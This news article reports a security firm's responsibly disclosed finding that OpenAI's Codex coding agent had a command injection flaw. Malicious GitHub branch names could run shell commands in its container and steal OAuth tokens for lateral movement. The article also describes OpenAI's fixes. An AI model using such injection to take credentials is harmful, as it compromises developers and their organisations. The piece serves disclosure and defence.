'Not just development tools': Security experts…

'Not just development tools': Security experts discover critical flaw in OpenAI's Codex which could compromise entire enterprise organizations

Abstract image of cyber security in action.

BeyondTrust Phantom Labs finds critical command injection flaw in OpenAI’s ChatGPT Codex
Vulnerability let attackers steal GitHub OAuth tokens via malicious branch names
OpenAI patched with stronger input validation, shell escaping, and token controls

Experts have claimed OpenAI’s ChatGPT Codex carried a critical command injection vulnerability which allowed threat actors to steal sensitive GitHub authentication tokens.

This is according to BeyondTrust’s research department, Phantom Labs, whose work helped OpenAI identify and patch the flaw.

ChatGPT Codex is a coding feature within the famed chatbot that helps users write and edit software using plain-language instructions. Users can turn human-language requests into working code or can suggest fixes and improvements the same way.

How to govern AI agents

When a developer makes changes to a GitHub project, they do it in their own copy, which is a separate branch of the project. Now, according to BeyondTrust Phantom Labs, the problem stems from the way Codex processes branch names during task creation.

Apparently, the tool allowed a (malicious) actor to manipulate the branch parameter and inject arbitrary shell commands while setting up the environment.

These commands could run any code within the container, including malicious ones. Phantom Labs said they were able to pull GitHub OAuth tokens this way, gaining access to a theoretical third-party project, and using the tokens to move laterally within GitHub.

Unfortunately - it gets worse. Codex’s command-line interface, SDK, and development environment integrations were all flawed in the same way, and the researchers said that by embedding malware into GitHub branch names they would be able to compromise numerous developers working on the same project.

After responsibly disclosing the findings to OpenAI, the company fixed the problem with improved input validation, stronger shell escaping protections, and better controls over token exposures inside containers. Token scope and lifetime during task creation were also limited, it was said.

AI coding agents are “live execution environments with access to sensitive credentials and organizational resources,” the researchers concluded.

“Because these agents act autonomously, security teams must understand how to govern AI agent identities to prevent command injection, token theft, and automated exploitation at scale. As AI agents become more deeply integrated into developer workflows, the security of the containers they run in—and the input they consume—must be treated with the same rigor as any other application security boundary.”

Read news from 100's of titles, curated specifically for you.

Already a member? Sign in here